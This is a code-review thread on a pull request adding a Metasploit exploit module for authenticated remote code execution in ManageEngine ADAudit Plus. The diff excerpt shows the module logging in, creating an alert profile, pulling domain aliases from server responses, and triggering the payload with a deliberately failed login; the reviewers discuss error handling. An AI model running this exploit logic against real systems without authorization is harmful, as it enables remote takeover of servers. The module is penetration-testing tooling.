modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,526 @@
+        print_error(login_msg)
+        print_warning('The module will proceed, but exploitation may fail.')
+      when adaudit_plus_status::SUCCESS
+        @domain = login_results['configured_domains'].first
+        vprint_status("Using domain #{@domain} for the name of the directory we will be creating")
+      end
+
+      print_good('Successfully authenticated')
+      @adapcsrf_cookie = login_results['adapcsrf_cookie']
+    end
+
+    # let's create the alert profile
+    create_alert_profile
+
+    # time to trigger the payload
+    if @domain_alias.nil?
+      # this means check didn't run, so we need to obtain the configured active directory domains
+      target_check_results = adaudit_plus_target_check
+      target_check_msg = target_check_results['message']
+      unless target_check_results['status'] == adaudit_plus_status::SUCCESS
+        print_error('Failed to obtain the configured Active Directory domain aliases')
+        fail_with(Failure::Unknown, target_check_msg)
+      end
+      target_check_res = target_check_results['server_response']
+
+      # in order to trigger the final payload in the exploit method, we will need to send an authentication request to ADAudit Plus with incorrect active directory credentials
+      # if the user didn't provide an active directory domain, we can try to extract the FQDN for a configured domain from the server response
+      domain_alias_results = adaudit_plus_grab_domain_aliases(target_check_res.body)
+      domain_alias_msg = domain_alias_results['message']
+      if domain_alias_results['status'] == adaudit_plus_status::NO_MATCH
+        fail_with(Failure::NotVulnerable, domain_alias_msg)
+      end
+
+      domain_aliases = domain_alias_results['domain_aliases']
+      if auth_domain == 'ADAuditPlus Authentication' || domain_aliases&.include?(auth_domain)
+        vprint_status(domain_alias_msg)
+        @domain_alias = domain_aliases.first
+        print_status("Using configured authentication domain alias #{@domain_alias}.")
+      else
+        print_status(domain_alias_msg)
+        fail_with(Failure::BadConfig, "The provided AUTH_DOMAIN #{auth_domain} does not match the configured authentication domain(s).")
+      end
+    end
+
+    print_status("Attempting to trigger the payload via an authentication attempt for domain #{@domain_alias} using incorrect credentials.")
+    login_results = adaudit_plus_login(@domain_alias, rand_text_alphanumeric(5..8), rand_text_alphanumeric(8..12), true)
+    login_msg = login_results['message']
+    case login_results['status']
+    when adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY
+      fail_with(Failure::Unknown, "#{login_msg} You can try to manually trigger the payload via a failed login attempt for the #{@domain_alias} domain.")
+    when adaudit_plus_status::NO_ACCESS
+      print_status("Received expected reply when trying to trigger the payload. Let's hope we get a shell...")
+    else
```

Comment:
What about NO_MATCH which is thrown by `adaudit_plus_grab_configured_domains` which is called by this method? This isn't being caught here.

Reply:
here is it is covered by the `else` clause, which I think should be fine?

Reply:
Actually upon reviewing this your current code as it is written will fall through to this `print_warning` line if the code is SUCCESS. 

My concern was that if we add more error codes in the future, your current message assumes that any unknown error code is after a connection has already been made and we have received a response, which may not be the case. We should instead just state that we got an unknown error code and leave it at that vs making assumptions which may or may not be true.

Reply:
good point. I added a case for `SUCCESS` and mentioned the unknown error code for the else statement